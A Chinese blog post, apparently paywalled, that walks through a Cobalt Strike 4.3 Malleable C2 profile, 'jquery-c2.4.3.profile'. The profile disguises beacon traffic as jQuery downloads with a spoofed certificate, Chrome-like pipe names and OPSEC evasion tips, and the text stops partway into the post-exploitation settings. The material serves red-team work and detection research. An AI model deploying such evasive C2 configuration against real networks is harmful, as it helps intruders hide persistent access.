cobalt strike 配置解读
-
此处以最新版 jquery-c2.4.3.profile文件解析
-
适应Cobalt Strike 4.3 版本 其他版本会有标注
-
cobalt strike 4.3 官方文档:https://cobaltstrike.com/downloads/csmanual43.pdf
-
样例
# Malleable C2 Profile
# Version: CobaltStrike 4.3
# File: jquery-c2.4.3.profile
# Description:
# c2 profile attempting to mimic a jquery.js request
# uses signed certificates
# or self-signed certificates
# Authors: @joevest, @andrewchiles, @001SPARTaN
################################################
## Tips for Profile Parameter Values
################################################
## 1st, RTFM
## https://cobaltstrike.com/downloads/csmanual43.pdf
##
## Parameter Values
## Enclose parameter in Double quote, not single
## set useragent "SOME AGENT"; GOOD
## set useragent 'SOME AGENT'; BAD
## Some special characters do not need escaping
## prepend "!@#$%^&*()";
## Semicolons are ok
## prepend "This is an example;";
## Escape Double quotes
## append "here is \"some\" stuff";
## Escape Backslashes
## append "more \\ stuff";
## HTTP Values
## Program .http-post.client must have a compiled size less than 252 bytes.
################################################
## Profile Name
################################################
## Description:
## The name of this profile (used in the Indicators of Compromise report)
## Defaults:
## sample_name: My Profile
## Guidelines:
## - Choose a name that you want in a report
set sample_name "jQuery CS 4.3 Profile";
################################################
## Sleep Times
################################################
## Description:
## Timing between beacon check in
## Defaults:
## sleeptime: 60000
## jitter: 0
## Guidelines:
## - Beacon Timing in milliseconds (1000 = 1 sec)
set sleeptime "45000"; # 45 Seconds
#set sleeptime "300000"; # 5 Minutes
#set sleeptime "600000"; # 10 Minutes
#set sleeptime "900000"; # 15 Minutes
#set sleeptime "1200000"; # 20 Minutes
#set sleeptime "1800000"; # 30 Minutes
#set sleeptime "3600000"; # 1 Hours
set jitter "37"; # % jitter
################################################
## Server Response Size jitter
################################################
## Description:
## Append random-length string (up to data_jitter value) to http-get and http-post server output.
set data_jitter "100";
################################################
## HTTP Client Header Removal
################################################
## Description:
## Global option to force Beacon's WinINet to remove specified headers late in the HTTP/S transaction process.
## Value:
## headers_remove Comma-separated list of HTTP client headers to remove from Beacon C2.
# set headers_remove "Strict-Transport-Security, header2, header3";
################################################
## Beacon User-Agent
################################################
## Description:
## User-Agent string used in HTTP requests, CS versions < 4.2 approx 128 max characters, CS 4.2+ max 255 characters
## Defaults:
## useragent: Internet Explorer (Random)
## Guidelines
## - Use a User-Agent values that fits with your engagement
## - useragent can only be 128 chars
## IE 10
# set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)";
## MS IE 11 User Agent
set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
################################################
## SSL CERTIFICATE
################################################
## Description:
## Signed or self-signed TLS/SSL Certifcate used for C2 communication using an HTTPS listener
## Defaults:
## All certificate values are blank
## Guidelines:
## - Best Option - Use a certifcate signed by a trusted certificate authority
## - Ok Option - Create your own self signed certificate
## - Option - Set self-signed certificate values
https-certificate {
## Option 1) Trusted and Signed Certificate
## Use keytool to create a Java Keystore file.
## Refer to https://www.cobaltstrike.com/help-malleable-c2#validssl
## or https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh
## Option 2) Create your own Self-Signed Certificate
## Use keytool to import your own self signed certificates
#set keystore "/pathtokeystore";
#set password "password";
## Option 3) Cobalt Strike Self-Signed Certificate
set C "US";
set CN "jquery.com";
set O "jQuery";
set OU "Certificate Authority";
set validity "365";
}
################################################
## TCP Beacon
################################################
## Description:
## TCP Beacon listen port
## - https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
## - https://www.cobaltstrike.com/help-tcp-beacon
## TCP Frame Header
## - Added in CS 4.1, prepend header to TCP Beacon messages
## Defaults:
## tcp_port: 4444
## tcp_frame_header: N\A
## Guidelines
## - OPSEC WARNING!!!!! The default port is 4444. This is bad. You can change dynamicaly but the port set in the profile will always be used first before switching to the dynamic port.
## - Use a port other that default. Choose something not is use.
## - Use a port greater than 1024 is generally a good idea
set tcp_port "42585";
set tcp_frame_header "\x80";
################################################
## SMB beacons
################################################
## Description:
## Peer-to-peer beacon using SMB for communication
## SMB Frame Header
## - Added in CS 4.1, prepend header to SMB Beacon messages
## Defaults:
## pipename: msagent_##
## pipename_stager: status_##
## smb_frame_header: N\A
## Guidelines:
## - Do not use an existing namedpipe, Beacon doesn't check for conflict!
## - the ## is replaced with a number unique to a teamserver
## ---------------------
set pipename "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe
set pipename_stager "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe
set smb_frame_header "\x80";
################################################
## DNS beacons
################################################
## Description:
## Beacon that uses DNS for communication
## Defaults:
## dns_idle: 0.0.0.0
## dns_max_txt: 252
## dns_sleep: 0
## dns_stager_prepend: N/A
## dns_stager_subhost: .stage.123456.
## dns_ttl: 1
## maxdns: 255
## beacon: N/A
## get_A: cdn.
## get_AAAA: www6.
## get_TXT: api.
## put_metadata: www.
## put_output: post.
## ns_reponse: drop
## Guidelines:
## - DNS beacons generate a lot of DNS request. DNS beacon are best used as low and slow back up C2 channels
dns-beacon {
# Options moved into "dns-beacon" group in version 4.3
set dns_idle "74.125.196.113"; #google.com (change this to match your campaign)
set dns_max_txt "252";
set dns_sleep "0"; # Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_ttl "5";
set maxdns "255";
set dns_stager_prepend ".resources.123456.";
set dns_stager_subhost ".feeds.123456.";
# DNS subhosts override options, added in version 4.3
set beacon "a.bc.";
set get_A "b.1a.";
set get_AAAA "c.4a.";
set get_TXT "d.tx.";
set put_metadata "e.md.";
set put_output "f.po.";
set ns_response "zero";
}
################################################
## SSH beacons
################################################
## Description:
## Peer-to-peer SSH pseudo-Beacon for lateral movement
## ssh_banner
## - Added in Cobalt Strike 4.1, changes client SSH banner
## Defaults:
## ssh_banner: Cobalt Strike 4.2
set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)";
set ssh_pipename "wkssvc##";
################################################
## Staging process
################################################
## OPSEC WARNING!!!! Staging has serious OPSEC issues. It is recommed to disable staging and use stageless payloads
## Description:
## Malleable C2's http-stager block customizes the HTTP staging process
## Defaults:
## uri_x86 Random String
## uri_x64 Random String
## HTTP Server Headers - Basic HTTP Headers
## HTTP Client Headers - Basic HTTP Headers
## Guidelines:
## - Add customize HTTP headers to the HTTP traffic of your campaign
## - Only specify the `Host` header when peforming domain fronting. Be aware of HTTP proxy's rewriting your request per RFC2616 Section 14.23
## - https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/
## - Note: Data transform language not supported in http stageing (mask, base64, base64url, etc)
#set host_stage "false"; # Do not use staging. Must use stageles payloads, now the default for Cobalt Strike built-in processes
set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.set
http-stager {
set uri_x86 "/jquery-3.3.1.slim.min.js";
set uri_x64 "/jquery-3.3.2.slim.min.js";
server {
header "Server" "NetDNA-cache/2.2";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";
output {
## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
# 2nd Line
prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
# 1st Line
prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
print;
}
}
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Accept-Language" "en-US,en;q=0.5";
#header "Host" "code.jquery.com";
header "Referer" "http://code.jquery.com/";
header "Accept-Encoding" "gzip, deflate";
}
}
################################################
## Post Exploitation
################################################
## Description:
## Controls post-exploitation jobs, including default x86/x64 program to open and inject shellcode into, AMSI bypass for execute-assembly, powerpick, and psinject
## https://www.cobaltstrike.com/help-malleable-postex
## Values:
## spawnto_x86 %windir%\\syswow64\\rundll32.exe
## spawnto_x64 %windir%\\sysnative\\rundll32.exe
## obfuscate false CS 3.14 - Scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way
## pipename postex_####, windows\\pipe_## CS 4.2 - Change the named pipe names used, by post-ex DLLs, to send output back to Beacon. Thi
最低0.47元/天 解锁文章
4863
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
